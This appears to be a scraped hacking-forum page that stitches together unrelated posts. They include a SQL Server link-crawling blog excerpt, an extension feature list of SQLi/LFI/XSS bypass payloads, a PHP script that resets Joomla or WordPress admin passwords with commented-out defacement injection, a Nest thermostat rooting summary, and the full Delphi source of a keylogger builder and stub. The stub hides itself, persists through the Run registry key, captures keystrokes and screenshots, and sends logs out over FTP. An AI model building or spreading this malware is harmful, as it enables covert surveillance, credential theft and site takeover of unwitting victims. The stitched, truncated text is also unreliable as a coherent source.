Crawling database links in order to execute queries with sysadmin privileges is a technique we leverage in almost every environment. Antti Rantasaari provided a nice overview of database links in his blog "https://www.netspi.com/blog/entryid/197/how-to-hack-database-links-in-sql-server We also wrote a Metasploit module for attacking them a while back that can found https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/mssql/mssql_linkcrawler.rb Although you can enumerate database links blindly I thought it would be handy to grab a count of links from each accessible SQL Server with the script. You can display them by using the “-showsum” and “-showstatus” switches. Similar to the last example the results can also be export to CSV and easily viewed. Below is one last example. PS C:\Get-SQLServerAccess -ShowSum | export-csv c:\temp\sql-server-excessive-privs.csv [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomain\myuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as mydomain\myuser... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [+] SUCCESS! - server2.mydomain.com\AppOneDev (192.168.1.102) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.com\AppOneProd (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.com\SQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server4.mydomain.com\AppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] ---------------------------------------------------------------------- As you can see in the example two servers have database links that could potentially be exploited. Wrap Up Download the script, use it to find holes, and plug the holes. Have fun and hack responsibly! Sursa: https://www.netspi.com/blog/entryid/228/locate-and-attack-domain-sql-servers-without-scanning

In a major development, Redmond giant Microsoft has yet again inched closer towards open source technology by donating the source code for it's MS-DOS and Word for Windows programs. The source code of MS-DOS versions 1.1 (released in 1982) and 2.0 (released in 1983), as also the code for Microsoft Word for Windows 1.1a (released in 1989) is now publicly available via the Computer History Museum in Mountain View, Calif. Anyone can now download the code from the museum's official web site, however, it must be noted that the code is solely available for non-commercial use subject to a license agreement approval. Computer History Museum | @CHM : Microsoft Word for Windows Version 1.1a Source Code Computer History Museum | @CHM : MICROSOFT RESEARCH LICENSE AGREEMENT | Microsoft DOS V1.1 and V2.0 La asa ceva niciodata nu mas fi gandit... ) au dat source code cand au trecut ani buni, dar sa dea la ceva nou, nu au de gand:))

Features: [ 1 Encoders one-way ] 1.1 MD5 Encode 1.2 SHA-1 Encode 1.3 SHA-256 Encode 1.4 SHA-384 Encode 1.5 SHA-512 Encode 1.6 DES Encode [ 2 Encoders ] 2.1 Base-64 Encode 2.2 URL Encode 2.3 Leet Encode 2.4 HTMLEntities Encode 2.5 Morse Encode 2.6 ASCII-85 Encode 2.7 ROT-13 Encode [ 3 Decoders ] 3.1 Base-64 Decode 3.2 URL Decode 3.3 Leet Decode 3.4 HTMLEntities Decode 3.5 Morse Decode 3.6 ASCII-85 Decode 3.7 ROT-13 Decode [ 4 Bruteforcers ] 4.1 MD5 Bruteforce 4.2 SHA1 Bruteforce [ 5 Converters ] 5.1 ASCII to Decimal 5.2 Decimal to ASCII(on comma) 5.3 Decimal to ASCII(on space) 5.4 ASCII to Binary 5.5 Binary to ASCII 5.6 ASCII to HEX 5.7 HEX to ASCII 5.8 Binary to HEX 5.9 HEX to Binary [ 6 String tools ] 6.1 Reverse string 6.2 Remove spaces 6.3 String Length 6.4 String to uppercase 6.5 String to lowercase 6.6 String replacer [ 7 SQL injection tools ] 7.1 Column count generator 7.2 Mixed case bypass 7.3 SQLi WAF bypass (union) 7.4 SQLi WAF bypass (tables) 7.5 SQLi WAF bypass (columns) 7.6 Error based SQLi (version) 7.7 Error based SQLi (database) 7.8 Error based SQLi (tables) 7.9 Error based SQLi (columns) 7.10 Error based SQLi (data) 7.11 Blind SQLi (database count) 7.12 Blind SQLi (database name length) 7.13 Blind SQLi (database name) 7.14 Blind SQLi (tables count) 7.15 Blind SQLi (table name length) 7.16 Blind SQLi (table name) 7.17 Blind SQLi (column count) 7.18 Blind SQLi (column name length) 7.19 Blind SQLi (column name) 7.20 Blind SQLi (data) [ 8 Other hacking tools ] 8.1 LFI (etc/passwd) 8.2 LFI (proc/self/environ) 8.3 LFI bypass (url encode) 8.4 LFI bypass (../ replace) 8.5 LFI bypass 2 (../ replace) 8.6 XSS bypass (String.fromCharCode) 8.7 XSS bypass (tag name replace) https://chrome.google.com/webstore/detail/hackers-toolkit/gnniaejgfdelaafcjopndjdebjfnkljf?hl=en-US

What's this? HeidiSQL screenshot HeidiSQL screenshot: Session manager HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQL server, and Microsoft SQL databases. It enables you to browse and edit data, create and edit tables, views, procedures, triggers and scheduled events. Also, you can export structure and data either to SQL file, clipboard or to other servers. HeidiSQL - MySQL, MSSQL and PostgreSQL made easy Features Free for everyone, OpenSource. Connect to multiple servers in one window Connect to servers via commandline Connect via SSH tunnel, or pass SSL settings Create and edit tables, views, stored routines, triggers and scheduled events. Generate nice SQL-exports, compress these afterwards, or put them on the clipboard. Export from one server/database directly to another server/database Manage user-privileges Import text-files Export table rows as CSV, HTML, XML, SQL, LaTeX, Wiki Markup and PHP Array Browse and edit table-data using a comfortable grid Bulk edit tables (move to db, change engine, collation etc.) Batch-insert ascii or binary files into tables Write queries with customizable syntax-highlighting and code-completion Pretty reformat disordered SQL Monitor and kill client-processes Find specific text in all tables of all databases of one server Optimize and repair tables in a batch manner Launch a parallel mysql.exe command line window using your current connection settings And much more.. Download HeidiSQL

query.php <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Exploit query 2011 #</title> </head> <style type="text/css"> body{ background: #333333; color: #fff; font-family: Consolas; font-size: 13px; } .text { background: #fff; color: #000; } .text:hover { background: #FFFFCC; } .submit { background: #333330; padding: 2px; margin: 0px; color: #fff; border: thick; } .submit:hover { background: #555; } </style> <body> <center><h2># Mysql Query #</h2> <form action="" method="post"> host : <input type="text" value="localhost" name="localhost" class="text" /> db : <input type="text" name="db" class="text" /><br /> user : <input type="text" name="userdb" class="text" /> pass : <input type="text" name="passdb" class="text" /><br /> <br />What password ! : <input type="text" name="mdpass" class="text" /><br /> joomla : <input type="radio" value="1" name="ch1" /> wordpress: <input type="radio" value="2" name="ch1" /> <br /> <br /> <input type="submit" name ="go" value="#- Done -#" class="submit" /> </form> </center> <? $host = $_POST['locch1alhost']; $dbname = $_POST['db']; $dbuser = $_POST['userdb']; $dbpass = $_POST['passdb']; $kolk = md5($_POST['mdpass']); if ($_POST['ch1'] == 1) { $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database"); $selectdb = mysql_select_db($dbname,$connect); $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_sche ma) from information_schema.columns where column_name LIKE "%pas%"'); $show = mysql_fetch_array($cyber); $defg = $show[0]; $imp = explode(':',$defg); $ar = $imp[0]; $conar = mysql_query("SELECT * FROM $ar"); $showar = mysql_fetch_array($conar); ################# set $setar = mysql_query("UPDATE $ar SET password='".$kolk."' WHERE id = '".$showar[0]."' "); echo $setar; echo "user name is -> $showar[2]"; } else if ($_POST['ch1'] == '2') { $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database"); $selectdb = mysql_select_db($dbname,$connect); $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_sche ma) from information_schema.columns where column_name LIKE "%user_pass%"'); $show = mysql_fetch_array($cyber); $defg = $show[0]; $imp = explode(':',$defg); $ar = $imp[0]; $conar = mysql_query("SELECT * FROM $ar"); $showar = mysql_fetch_array($conar); ################# set $setar = mysql_query("UPDATE $ar SET user_pass='".$kolk."' WHERE id = '".$showar[0]."' "); $setar .= mysql_query("UPDATE $ar SET user_login='admin' WHERE id = '".$showar[0]."' "); echo $setar; echo "user name is -> $showar[1]"."<br />"; #$qurl = mysql_query("select guid from wp_posts"); #$scr = "<script>document.location='http://zonehmirrors.net/defaced/2011/10/07/ecocolourchembd.com'</script>"; #$indq = mysql_query('UPDATE wp_posts SET post_title="'.$scr.'" WHERE id =1'); #$indexar = mysql_fetch_array($indq); #$qin = mysql_query("select post_title from wp_posts where id =1"); #$rqin = mysql_fetch_array($qin); # echo htmlspecialchars("$rqin[0]"); $q = mysql_query("select * from wp_options where option_id='1' or option_name='home'"); while($wos = mysql_fetch_object($q)){ if ($wos){ echo "URL : ~> ".$wos->option_value."<br>"; }} } ?> </body> <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> <center><b>Meked By Cyber-Crystal </b></center> </html> Download Tool: "wpdef" Download wpdef.rar

Ardamax a fost candva si el, acum ceea ce ia ramas e doar numele, depinde pot sa zic ca asta e mai elegant mai sigur si mai bun!

Nest, a company recently acquired by Google, offers a variety of popular network enabled home utilities. The most popular of which is a thermostat that allows a user to control their household temperature remotely from their smart phone. This device, although seemingly useful, if not well protected can allow an attacker the ability to remotely monitor user’s habits or network traffic. Below, we will go into a method of attacking Nest brand thermostats by leveraging the device’s DFU mode to boot unsigned code at the boot-loader level. What this means in layman’s terms is that we are able to hijack the device’s code flow very early on, allowing us to make changes without ANY restrictions. Below we will describe the attack, our method of exploiting it, and our proof of concept code which allows a user to backdoor a Nest thermostat. The Bug: The Nest uses a CPU similar to the OMAP3630 series. This CPU features a Device Firmware Update (DFU) mode that can be accessed by holding down the Nest’s screen while off. This mode is intended for the manufacturer to easily diagnose and repair the device. Unfortunately, in the case of the Nest, this mode also allows us to modify the device without restriction. The Attack: Our attack on the Nest thermostat is simple, we use the device’s recovery mode to run our own modified boot-loader (stage one and two). We then use our loaded boot-loaders to initiate a Linux kernel that is used to modify the file system on the Nest. We then add a SSH server running as root as well as functionality to create a reverse SSH tunnel to a specified host using the Nest’s virtual drive. GTV Hacker » Blog Archive » Google Nest: Exploiting DFU For Root sursa: https://news.ycombinator.com/newest

Edit.. A-O-=128 decrypt! studiati, fara sa modificati..

New version of this keylogger , this keylogger has the following functions: Capture the keys as uppercase lowercase as well as numbers and other key Capture the name of the current window Screen Capture Logs sorted in an HTML file You can choose the directory in which the logs are stored Logs are sent by FTP Traces are hidden Is loaded every time you start Windows You can use Shift + F9 to load the logs on the infected machine I also made a generator keylogger that also allows you to view logs that are in the FTP server used for keylogger video: Sources : Generator : Code: Delphi // DH KeyCagator 1.0 // (C) Doddy Hackman 2014 // Keylogger Generator // Icon Changer based in : "IconChanger" By Chokstyle // Thanks to Chokstyle unit dhkey; interface uses Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ComCtrls, Vcl.Imaging.jpeg, Vcl.ExtCtrls, Vcl.StdCtrls, Vcl.Imaging.pngimage, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdExplicitTLSClientServerBase, IdFTP, ShellApi, MadRes; type TForm1 = class(TForm) Image1: TImage; StatusBar1: TStatusBar; PageControl1: TPageControl; TabSheet1: TTabSheet; GroupBox1: TGroupBox; GroupBox2: TGroupBox; RadioButton1: TRadioButton; RadioButton2: TRadioButton; ComboBox1: TComboBox; Edit2: TEdit; GroupBox3: TGroupBox; TabSheet2: TTabSheet; Edit1: TEdit; GroupBox4: TGroupBox; CheckBox1: TCheckBox; Edit3: TEdit; Label1: TLabel; TabSheet3: TTabSheet; GroupBox5: TGroupBox; GroupBox6: TGroupBox; CheckBox2: TCheckBox; Edit4: TEdit; Label2: TLabel; GroupBox7: TGroupBox; Label3: TLabel; Edit5: TEdit; Label4: TLabel; Edit7: TEdit; Label5: TLabel; Edit8: TEdit; Label6: TLabel; Edit6: TEdit; TabSheet4: TTabSheet; GroupBox8: TGroupBox; GroupBox9: TGroupBox; Label7: TLabel; Edit9: TEdit; Label8: TLabel; Edit11: TEdit; Label9: TLabel; Edit12: TEdit; Label10: TLabel; Edit10: TEdit; GroupBox10: TGroupBox; Button1: TButton; GroupBox12: TGroupBox; Button2: TButton; CheckBox3: TCheckBox; IdFTP1: TIdFTP; TabSheet6: TTabSheet; GroupBox11: TGroupBox; Image2: TImage; Memo1: TMemo; OpenDialog1: TOpenDialog; procedure Button1Click(Sender: TObject); procedure FormCreate(Sender: TObject); procedure Button2Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} // Functions function dhencode(texto, opcion: string): string; // Thanks to Taqyon // Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex var num: integer; aca: string; cantidad: integer; begin num := 0; Result := ''; aca := ''; cantidad := 0; if (opcion = 'encode') then begin cantidad := length(texto); for num := 1 to cantidad do begin aca := IntToHex(ord(texto[num]), 2); Result := Result + aca; end; end; if (opcion = 'decode') then begin cantidad := length(texto); for num := 1 to cantidad div 2 do begin aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2))); Result := Result + aca; end; end; end; // procedure TForm1.Button1Click(Sender: TObject); var i: integer; dir: string; busqueda: TSearchRec; begin IdFTP1.Host := Edit9.Text; IdFTP1.Username := Edit11.Text; IdFTP1.Password := Edit12.Text; dir := ExtractFilePath(ParamStr(0)) + 'read_ftp\'; try begin FindFirst(dir + '\*.*', faAnyFile + faReadOnly, busqueda); DeleteFile(dir + '\' + busqueda.Name); while FindNext(busqueda) = 0 do begin DeleteFile(dir + '\' + busqueda.Name); end; FindClose(busqueda); rmdir(dir); end; except // end; if not(DirectoryExists(dir)) then begin CreateDir(dir); end; ChDir(dir); try begin IdFTP1.Connect; IdFTP1.ChangeDir(Edit10.Text); IdFTP1.List('*.*', True); for i := 0 to IdFTP1.DirectoryListing.Count - 1 do begin IdFTP1.Get(IdFTP1.DirectoryListing.Items[i].FileName, IdFTP1.DirectoryListing.Items[i].FileName, False, False); end; ShellExecute(0, nil, PChar(dir + 'logs.html'), nil, nil, SW_SHOWNORMAL); IdFTP1.Disconnect; IdFTP1.Free; end; except // end; end; procedure TForm1.Button2Click(Sender: TObject); var lineafinal: string; savein_especial: string; savein: string; foldername: string; bankop: string; capture_op: string; capture_seconds: integer; ftp_op: string; ftp_seconds: integer; ftp_host_txt: string; ftp_user_txt: string; ftp_pass_txt: string; ftp_path_txt: string; aca: THandle; code: Array [0 .. 9999 + 1] of Char; nose: DWORD; stubgenerado: string; op: string; change: DWORD; valor: string; begin if (RadioButton1.Checked = True) then begin savein_especial := '0'; if (ComboBox1.Items[ComboBox1.ItemIndex] = '') then begin savein := 'USERPROFILE'; end else begin savein := ComboBox1.Items[ComboBox1.ItemIndex]; end; end; if (RadioButton2.Checked = True) then begin savein_especial := '1'; savein := Edit2.Text; end; foldername := Edit1.Text; if (CheckBox1.Checked = True) then begin capture_op := '1'; end else begin capture_op := '0'; end; capture_seconds := StrToInt(Edit3.Text) * 1000; if (CheckBox2.Checked = True) then begin ftp_op := '1'; end else begin ftp_op := '0'; end; if (CheckBox3.Checked = True) then begin bankop := '1'; end else begin bankop := '0'; end; ftp_seconds := StrToInt(Edit4.Text) * 1000; ftp_host_txt := Edit5.Text; ftp_user_txt := Edit7.Text; ftp_pass_txt := Edit8.Text; ftp_path_txt := Edit6.Text; lineafinal := '[63686175]' + dhencode('[opsave]' + savein_especial + '[opsave]' + '[save]' + savein + '[save]' + '[folder]' + foldername + '[folder]' + '[capture_op]' + capture_op + '[capture_op]' + '[capture_seconds]' + IntToStr(capture_seconds) + '[capture_seconds]' + '[bank]' + bankop + '[bank]' + '[ftp_op]' + ftp_op + '[ftp_op]' + '[ftp_seconds]' + IntToStr(ftp_seconds) + '[ftp_seconds]' + '[ftp_host]' + ftp_host_txt + '[ftp_host]' + '[ftp_user]' + ftp_user_txt + '[ftp_user]' + '[ftp_pass]' + ftp_pass_txt + '[ftp_pass]' + '[ftp_path]' + ftp_path_txt + '[ftp_path]', 'encode') + '[63686175]'; aca := INVALID_HANDLE_VALUE; nose := 0; stubgenerado := 'keycagator_ready.exe'; DeleteFile(stubgenerado); CopyFile(PChar(ExtractFilePath(Application.ExeName ) + '/' + 'Data/keycagator.exe'), PChar(ExtractFilePath(Application.ExeName) + '/' + stubgenerado), True); StrCopy(code, PChar(lineafinal)); aca := CreateFile(PChar('keycagator_ready.exe'), GENERIC_WRITE, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0); if (aca <> INVALID_HANDLE_VALUE) then begin SetFilePointer(aca, 0, nil, FILE_END); WriteFile(aca, code, 9999, nose, nil); CloseHandle(aca); end; op := InputBox('Icon Changer', 'Change Icon ?', 'Yes'); if (op = 'Yes') then begin OpenDialog1.InitialDir := GetCurrentDir; if OpenDialog1.Execute then begin try begin valor := IntToStr(128); change := BeginUpdateResourceW (PWideChar(wideString(ExtractFilePath(Application. ExeName) + '/' + stubgenerado)), False); LoadIconGroupResourceW(change, PWideChar(wideString(valor)), 0, PWideChar(wideString(OpenDialog1.FileName))); EndUpdateResourceW(change, False); StatusBar1.Panels[0].Text := '[+] Done '; StatusBar1.Update; end; except begin StatusBar1.Panels[0].Text := '[-] Error'; StatusBar1.Update; end; end; end else begin StatusBar1.Panels[0].Text := '[+] Done '; StatusBar1.Update; end; end else begin StatusBar1.Panels[0].Text := '[+] Done '; StatusBar1.Update; end; end; procedure TForm1.FormCreate(Sender: TObject); begin OpenDialog1.InitialDir := GetCurrentDir; OpenDialog1.Filter := 'ICO|*.ico|'; end; end. // The End ? El stub. Code: Delphi // DH KeyCagator 1.0 // (C) Doddy Hackman 2014 program keycagator; // {$APPTYPE CONSOLE} uses SysUtils, Windows, WinInet, ShellApi, Vcl.Graphics, Vcl.Imaging.jpeg; var nombrereal: string; rutareal: string; yalisto: string; registro: HKEY; dir: string; time: integer; dir_hide: string; time_screen: integer; time_ftp: integer; ftp_host: Pchar; ftp_user: Pchar; ftp_password: Pchar; ftp_dir: Pchar; carpeta: string; directorio: string; bankop: string; dir_normal: string; dir_especial: string; ftp_online: string; screen_online: string; activado: string; ob: THandle; code: Array [0 .. 9999 + 1] of Char; nose: DWORD; todo: string; // Functions function regex(text: String; deaca: String; hastaaca: String): String; begin Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1); SetLength(text, AnsiPos(hastaaca, text) - 1); Result := text; end; function dhencode(texto, opcion: string): string; // Thanks to Taqyon // Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex var num: integer; aca: string; cantidad: integer; begin num := 0; Result := ''; aca := ''; cantidad := 0; if (opcion = 'encode') then begin cantidad := Length(texto); for num := 1 to cantidad do begin aca := IntToHex(ord(texto[num]), 2); Result := Result + aca; end; end; if (opcion = 'decode') then begin cantidad := Length(texto); for num := 1 to cantidad div 2 do begin aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2))); Result := Result + aca; end; end; end; procedure savefile(filename, texto: string); var ar: TextFile; begin try begin AssignFile(ar, filename); FileMode := fmOpenWrite; if FileExists(filename) then Append(ar) else Rewrite(ar); Write(ar, texto); CloseFile(ar); end; except // end; end; procedure upload_ftpfile(host, username, password, filetoupload, conestenombre: Pchar); // Credits : // Based on : http://stackoverflow.com/questions/1380309/why-is-my-program-not-uploading-file-on-remote-ftp-server // Thanks to Omair Iqbal var controluno: HINTERNET; controldos: HINTERNET; begin try begin controluno := InternetOpen(0, INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0); controldos := InternetConnect(controluno, host, INTERNET_DEFAULT_FTP_PORT, username, password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0); ftpPutFile(controldos, filetoupload, conestenombre, FTP_TRANSFER_TYPE_BINARY, 0); InternetCloseHandle(controldos); InternetCloseHandle(controluno); end except // end; end; procedure capturar_pantalla(nombre: string); // Function capturar() based in : // http://forum.codecall.net/topic/60613-how-to-capture-screen-with-delphi-code/ // http://delphi.about.com/cs/adptips2001/a/bltip0501_4.htm // http://stackoverflow.com/questions/21971605/show-mouse-cursor-in-screenshot-with-delphi // Thanks to Zarko Gajic , Luthfi and Ken White var aca: HDC; tan: TRect; posnow: TPoint; imagen1: TBitmap; imagen2: TJpegImage; curnow: THandle; begin aca := GetWindowDC(GetDesktopWindow); imagen1 := TBitmap.Create; GetWindowRect(GetDesktopWindow, tan); imagen1.Width := tan.Right - tan.Left; imagen1.Height := tan.Bottom - tan.Top; BitBlt(imagen1.Canvas.Handle, 0, 0, imagen1.Width, imagen1.Height, aca, 0, 0, SRCCOPY); GetCursorPos(posnow); curnow := GetCursor; DrawIconEx(imagen1.Canvas.Handle, posnow.X, posnow.Y, curnow, 32, 32, 0, 0, DI_NORMAL); imagen2 := TJpegImage.Create; imagen2.Assign(imagen1); imagen2.CompressionQuality := 60; imagen2.SaveToFile(nombre); imagen1.Free; imagen2.Free; end; // procedure capturar_teclas; var I: integer; Result: Longint; mayus: integer; shift: integer; banknow: string; const n_numeros_izquierda: array [1 .. 10] of string = ('48', '49', '50', '51', '52', '53', '54', '55', '56', '57'); const t_numeros_izquierda: array [1 .. 10] of string = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9'); const n_numeros_derecha: array [1 .. 10] of string = ('96', '97', '98', '99', '100', '101', '102', '103', '104', '105'); const t_numeros_derecha: array [1 .. 10] of string = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9'); const n_shift: array [1 .. 22] of string = ('48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '187', '188', '189', '190', '191', '192', '193', '291', '220', '221', '222', '226'); const t_shift: array [1 .. 22] of string = (')', '!', '@', '#', '\$', '%', '¨', '&', '*', '(', '+', '<', '_', '>', ':', '\', ' ? ', ' / \ ', '}', '{', '^', '|'); const n_raros: array [1 .. 17] of string = ('1', '8', '13', '32', '46', '187', '188', '189', '190', '191', '192', '193', '219', '220', '221', '222', '226'); const t_raros: array [1 .. 17] of string = ('[mouse click]', '[backspace]', '<br>[enter]<br>', '[space]', '[suprimir]', '=', ',', '-', '.', ';', '\', ' / ', ' \ \ \ ', ']', '[', '~', '\/'); begin while (1 = 1) do begin Sleep(time); // Time try begin // Others for I := Low(n_raros) to High(n_raros) do begin Result := GetAsyncKeyState(StrToInt(n_raros[I])); If Result = -32767 then begin savefile('logs.html', t_raros[I]); if (bankop = '1') then begin if (t_raros[I] = '[mouse click]') then begin banknow := IntToStr(Random(10000)) + '.jpg'; capturar_pantalla(banknow); SetFileAttributes(Pchar(dir + '/' + banknow), FILE_ATTRIBUTE_HIDDEN); savefile('logs.html', '<br><br><center><img src=' + banknow + '></center><br><br>'); end; end; end; end; // SHIFT if (GetAsyncKeyState(VK_SHIFT) <> 0) then begin for I := Low(n_shift) to High(n_shift) do begin Result := GetAsyncKeyState(StrToInt(n_shift[I])); If Result = -32767 then begin savefile('logs.html', t_shift[I]); end; end; for I := 65 to 90 do begin Result := GetAsyncKeyState(I); If Result = -32767 then Begin savefile('logs.html', Chr(I + 0)); End; end; end; // Numbers for I := Low(n_numeros_derecha) to High(n_numeros_derecha) do begin Result := GetAsyncKeyState(StrToInt(n_numeros_derecha[I])); If Result = -32767 then begin savefile('logs.html', t_numeros_derecha[I]); end; end; for I := Low(n_numeros_izquierda) to High(n_numeros_izquierda) do begin Result := GetAsyncKeyState(StrToInt(n_numeros_izquierda[I])); If Result = -32767 then begin savefile('logs.html', t_numeros_izquierda[I]); end; end; // MAYUS if (GetKeyState(20) = 0) then begin mayus := 32; end else begin mayus := 0; end; for I := 65 to 90 do begin Result := GetAsyncKeyState(I); If Result = -32767 then Begin savefile('logs.html', Chr(I + mayus)); End; end; end; except // end; end; end; procedure capturar_ventanas; var ventana1: array [0 .. 255] of Char; nombre1: string; Nombre2: string; // begin while (1 = 1) do begin try begin Sleep(time); // Time GetWindowText(GetForegroundWindow, ventana1, sizeOf(ventana1)); nombre1 := ventana1; if not(nombre1 = Nombre2) then begin Nombre2 := nombre1; savefile('logs.html', '<hr style=color:#00FF00><h2><center>' + Nombre2 + '</h2></center><br>'); end; end; except // end; end; end; procedure capturar_pantallas; var generado: string; begin while (1 = 1) do begin Sleep(time_screen); generado := IntToStr(Random(10000)) + '.jpg'; try begin capturar_pantalla(generado); end; except // end; SetFileAttributes(Pchar(dir + '/' + generado), FILE_ATTRIBUTE_HIDDEN); savefile('logs.html', '<br><br><center><img src=' + generado + '></center><br><br>'); end; end; procedure subirftp; var busqueda: TSearchRec; begin while (1 = 1) do begin try begin Sleep(time_ftp); upload_ftpfile(ftp_host, ftp_user, ftp_password, Pchar(dir + 'logs.html'), Pchar(ftp_dir + 'logs.html')); FindFirst(dir + '*.jpg', faAnyFile, busqueda); upload_ftpfile(ftp_host, ftp_user, ftp_password, Pchar(dir + busqueda.Name), Pchar(ftp_dir + busqueda.Name)); while FindNext(busqueda) = 0 do begin upload_ftpfile(ftp_host, ftp_user, ftp_password, Pchar(dir + '/' + busqueda.Name), Pchar(ftp_dir + busqueda.Name)); end; end; except // end; end; end; procedure control; var I: integer; re: Longint; begin while (1 = 1) do begin try begin Sleep(time); if (GetAsyncKeyState(VK_SHIFT) <> 0) then begin re := GetAsyncKeyState(120); If re = -32767 then Begin ShellExecute(0, nil, Pchar(dir + 'logs.html'), nil, nil, SW_SHOWNORMAL); End; end; end; except // end; End; end; // begin try // Config try begin // Edit ob := INVALID_HANDLE_VALUE; code := ''; ob := CreateFile(Pchar(paramstr(0)), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0); if (ob <> INVALID_HANDLE_VALUE) then begin SetFilePointer(ob, -9999, nil, FILE_END); ReadFile(ob, code, 9999, nose, nil); CloseHandle(ob); end; todo := regex(code, '[63686175]', '[63686175]'); todo := dhencode(todo, 'decode'); dir_especial := Pchar(regex(todo, '[opsave]', '[opsave]')); directorio := regex(todo, '[save]', '[save]'); carpeta := regex(todo, '[folder]', '[folder]'); bankop := regex(todo, '[bank]', '[bank]'); screen_online := regex(todo, '[capture_op]', '[capture_op]'); time_screen := StrToInt(regex(todo, '[capture_seconds]', '[capture_seconds]')); ftp_online := Pchar(regex(todo, '[ftp_op]', '[ftp_op]')); time_ftp := StrToInt(regex(todo, '[ftp_seconds]', '[ftp_seconds]')); ftp_host := Pchar(regex(todo, '[ftp_host]', '[ftp_host]')); ftp_user := Pchar(regex(todo, '[ftp_user]', '[ftp_user]')); ftp_password := Pchar(regex(todo, '[ftp_pass]', '[ftp_pass]')); ftp_dir := Pchar(regex(todo, '[ftp_path]', '[ftp_path]')); dir_normal := dir_especial; time := 100; // Not Edit if (dir_normal = '1') then begin dir_hide := directorio; end else begin dir_hide := GetEnvironmentVariable(directorio) + '/'; end; dir := dir_hide + carpeta + '/'; if not(DirectoryExists(dir)) then begin CreateDir(dir); end; ChDir(dir); nombrereal := ExtractFileName(paramstr(0)); rutareal := dir; yalisto := dir + nombrereal; MoveFile(Pchar(paramstr(0)), Pchar(yalisto)); SetFileAttributes(Pchar(dir), FILE_ATTRIBUTE_HIDDEN); SetFileAttributes(Pchar(yalisto), FILE_ATTRIBUTE_HIDDEN); savefile(dir + '/logs.html', ''); SetFileAttributes(Pchar(dir + '/logs.html'), FILE_ATTRIBUTE_HIDDEN); savefile('logs.html', '<style>body {background-color: black;color:#00FF00;cursor:crosshair;}</style>'); RegCreateKeyEx(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run\', 0, nil, REG_OPTION_NON_VOLATILE, KEY_WRITE, nil, registro, nil); RegSetValueEx(registro, 'uberk', 0, REG_SZ, Pchar(yalisto), 666); RegCloseKey(registro); end; except // end; // End // Start the party BeginThread(nil, 0, @Control, nil, 0, PDWORD(0)^); // Readln; while (1 = 1) do Sleep(time); except // end; end. // The End ? DH KeyCagator | Free software downloads at SourceForge.net sursa: https://evilzone.org/delphi-and-pascal/(delphi)-dh-keycagator-1-0/

Encoding UDF Description: Library allows to work with different encodings of strings. Supported encodings: ANSI, OEM, Unicode, UTF-8 (+ with BOM), KOI8-R, IBM-866, ISO-8859-5, WINDOWS-1251, JavaUnicode, Base64, URI. Download: https://www.dropbox.com/s/qm8ve884bep9uvg/Encoding.zip Nomad Memory Description: Library allows to work with executable memory Download https://www.dropbox.com/s/grcvprjfwhhg0xm/NomadMemory.au3 extended WinApi Description: _WinAPIEx.au3 is an extension to the standard library AutoIt WinAPI.au3. UDF includes some undocumented but very useful features, such as, _WinAPI_GetFontResourceInfo (), and also contains all the necessary constants. The library is primarily intended for more or less experienced users, but I think many will find it for something useful. Description of all functions (in English) is located inside the library, is also present in the help file format (. Chm). Download https://www.dropbox.com/s/k2ogln94a7bqtpe/WinAPIEx_3.8_3361.zip DllMem Description: This UDF will work with the DLL from memory. Download: https://www.dropbox.com/s/ucp4e8gdsk8zkej/DllMem.zip MouseOnEvent Description: Allows you to set the mouse event handling. Also, support blocking event in the specified window. Download: https://www.dropbox.com/s/axfyfph8446i4kt/MouseOnEvent.zip FileOperations Description: Adds a set of functions for working with files Download:https://www.dropbox.com/s/xex81jolg76z20g/FileOperations.rar BlockInputEx Description: Allows you to block the mouse and keyboard in extended mode. This library supports some features that are not available in the built BlockInput (). Download: https://www.dropbox.com/s/fmmiymp4cg3laey/BlockInputEx_UDF_1.8.zip AutoItPacker3 Description: UDF to create an archive in any file with its subsequent removal. Has the ability to password encryption (RC4) and the ability to display the progress bar. Download: https://www.dropbox.com/s/10q2zhdfxknbvzb/AutoItPacker3.zip RSA_crypt Description: cut , but quite reliable option encryption algorithm RSA.The library is intended for 